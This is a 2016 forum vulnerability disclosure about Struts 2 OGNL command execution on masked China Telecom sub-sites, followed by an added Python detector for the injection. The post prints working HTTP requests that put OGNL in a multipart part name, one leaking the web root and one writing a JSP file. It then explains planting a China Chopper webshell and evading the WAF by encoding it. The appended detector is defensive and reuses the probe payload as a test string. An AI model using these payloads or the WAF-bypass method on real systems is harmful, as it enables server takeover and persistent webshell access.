HanDs
Administrator

[July vulnerability disclosure] Improper fix of the command execution vulnerability on multiple China Telecom sub-sites (WAF bypass to write a webshell)

Details:

http://**.**.**.**:8080/emallTelOmsWeb/sysmgr/login/login.action

**.**.**.**/integrateSys/checkNum.action

**.**.**.**/item/queryGoods.action

Code:
GET /emallTelOmsWeb/sysmgr/login/login.action HTTP/1.1
Host: **.**.**.**:8080
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=389b3f46292c4ee795f3f64e37d6f4db
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.86 Safari/537.36
DNT: 1
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4
Cookie: JSESSIONID=7162A0058CDFF12F9D688291EFBF381F.b; TS01861ca2=018ac74bc404a46a20c97c350297187bbcdf602fb91b78c975361bc471aa231694a2486bb64c9a6ed89eb0460f926333cf4b4fecbf; TS01c98fdf=018ac74bc4d91c43f67f047b17a9d4eb3155e36b7aaee0491e3d4485516646565a63b75a7e
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alx-4.0
Content-Length: 220

--389b3f46292c4ee795f3f64e37d6f4db
Content-Disposition: form-data; name="redirect:/${(#context.get("com.opensymphony.xwork2.dispatcher.HttpServletRequest").getRealPath("/"))}"

-1
--389b3f46292c4ee795f3f64e37d6f4db--

This can be used to get a shell:

Code:
GET /emallTelOmsWeb/sysmgr/login/login.action HTTP/1.1
Host: **.**.**.**:8080
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=389b3f46292c4ee795f3f64e37d6f4db
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.86 Safari/537.36
DNT: 1
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4
Cookie: JSESSIONID=7162A0058CDFF12F9D688291EFBF381F.b; TS01861ca2=018ac74bc404a46a20c97c350297187bbcdf602fb91b78c975361bc471aa231694a2486bb64c9a6ed89eb0460f926333cf4b4fecbf; TS01c98fdf=018ac74bc4d91c43f67f047b17a9d4eb3155e36b7aaee0491e3d4485516646565a63b75a7e
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alx-4.0
Content-Length: 1750

--389b3f46292c4ee795f3f64e37d6f4db
Content-Disposition: form-data; name="redirect:/${"x"+(new **.**.**.**.PrintWriter("/home/ecss/emallTelOmsWeb8083/webapps/emallTelOmsWeb/s.jsp")).append("小马十六进制编码").close()}"

-1
--389b3f46292c4ee795f3f64e37d6f4db--

Then write in a Caidao (China Chopper) shell (submitting the small shell base64-encoded is enough to bypass the WAF).

Proof of vulnerability:

http://**.**.**.**:8080/emallTelOmsWeb/f.jsp?z0=utf-8

**.**.**.**/s.txt

**.**.**.**/s.txt

[Image: 屏幕快照 2016-05-30 下午3.17.54.png]

Fix recommendation:

Post #1
Posted: 2016-7-16   |   Views: 0   |   Replies: 0
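
An added example, not part of the original report and not code from the affected sites: a small Python detector for the pattern the two captured requests use. In both captures the injected expression sits in the name of a multipart form-data part (a Struts 2 `redirect:` prefix followed by an OGNL `${...}` expression), not in the part's body, which is why encoding the shell text that the expression writes gets past a WAF that only matches known shell source. The detector keys on the part name instead. It goes slightly beyond the post by also covering the related `redirectAction:`, `action:` and `method:` prefixes and the `%{` marker. The host name, the benign request and the field values are constructed; the boundary and the probe's part name are taken from the first capture.

```python
"""Detection of Struts 2 action-prefix / OGNL injection in multipart requests.

Added example for this post (not the report's code, not the sites' code).
The payload in the captured requests lives in the *name* of a form-data part,
so this inspects part names rather than grepping bodies for shell text, which
is exactly what the post's base64/hex encoding of the shell defeats.
"""
import re
from typing import Dict, List, Tuple

# Parameter-name prefixes Struts 2 used to select a result or method (the
# redirect: prefix is the one in the captures; the others are the related ones).
STRUTS_PREFIXES = ("redirect:", "redirectAction:", "action:", "method:")
# Markers of an OGNL expression in a parameter name or value.
OGNL_MARKERS = ("${", "%{", "#context", "#_memberAccess", "@java.")


def parse_multipart(body: bytes, boundary: str) -> List[Dict[str, str]]:
    """Split a multipart/form-data body into [{name, value}] parts.

    The name= regex is deliberately greedy: an injected name contains its own
    double quotes (get("...")), and a non-greedy match would truncate the
    expression before the OGNL markers are seen.
    """
    parts: List[Dict[str, str]] = []
    delim = b"--" + boundary.encode()
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):      # closing delimiter "--boundary--"
            break
        chunk = chunk.lstrip(b"\r\n")
        raw_headers, _, value = chunk.partition(b"\r\n\r\n")
        name = ""
        for line in raw_headers.decode("utf-8", "replace").split("\r\n"):
            if line.lower().startswith("content-disposition:"):
                m = re.search(r'name="(.*)"', line)
                if m:
                    name = m.group(1)
        parts.append({"name": name,
                      "value": value.rstrip(b"\r\n").decode("utf-8", "replace")})
    return parts


def suspicious_parts(parts: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """Return (truncated part name, reasons) for every part that looks injected."""
    findings = []
    for p in parts:
        reasons = []
        if p["name"].startswith(STRUTS_PREFIXES):
            reasons.append("struts action prefix in parameter name")
        for field in ("name", "value"):
            hits = [mk for mk in OGNL_MARKERS if mk in p[field]]
            if hits:
                reasons.append(f"ognl markers in {field}: {','.join(hits)}")
        if reasons:
            findings.append((p["name"][:60], reasons))
    return findings


def analyze_request(raw: bytes) -> List[Tuple[str, List[str]]]:
    """Pull the boundary from Content-Type and scan the multipart body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    boundary = None
    for line in head.decode("utf-8", "replace").split("\r\n")[1:]:
        if line.lower().startswith("content-type:"):
            m = re.search(r"boundary=([^;\s]+)", line)
            boundary = m.group(1) if m else None
    if boundary is None:
        return []      # not multipart: nothing for this detector to do
    return suspicious_parts(parse_multipart(body, boundary))


BOUNDARY = "389b3f46292c4ee795f3f64e37d6f4db"   # boundary from the captures


def build_request(field_name: str, value: str) -> bytes:
    """Constructed request to the report's login action (host is a placeholder)."""
    body = (f"--{BOUNDARY}\r\n"
            f'Content-Disposition: form-data; name="{field_name}"\r\n\r\n'
            f"{value}\r\n--{BOUNDARY}--\r\n").encode()
    head = ("GET /emallTelOmsWeb/sysmgr/login/login.action HTTP/1.1\r\n"
            "Host: telecom-subsite.invalid:8080\r\n"
            f"Content-Type: multipart/form-data; boundary={BOUNDARY}\r\n"
            f"Content-Length: {len(body)}\r\n").encode()
    return head + b"\r\n" + body


BENIGN = build_request("username", "alice")            # constructed login post
# Modelled on the first capture: the realPath() probe in the part name.
PROBE = build_request(
    'redirect:/${(#context.get("com.opensymphony.xwork2.dispatcher'
    '.HttpServletRequest").getRealPath("/"))}', "-1")

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("probe", PROBE)):
        print(label, analyze_request(req))
```

Running it flags the probe twice (action prefix, and `${` plus `#context` in the name) and leaves the login form alone. The point for the fix recommendation the post leaves empty: a WAF rule built on the part-name structure survives the encoding trick the post describes, while a rule built on the shell's source text does not, and in either case the WAF is a stopgap in front of a Struts 2 version that still honours these prefixes (Apache removed them in the S2-016 fix, Struts 2.3.15.1).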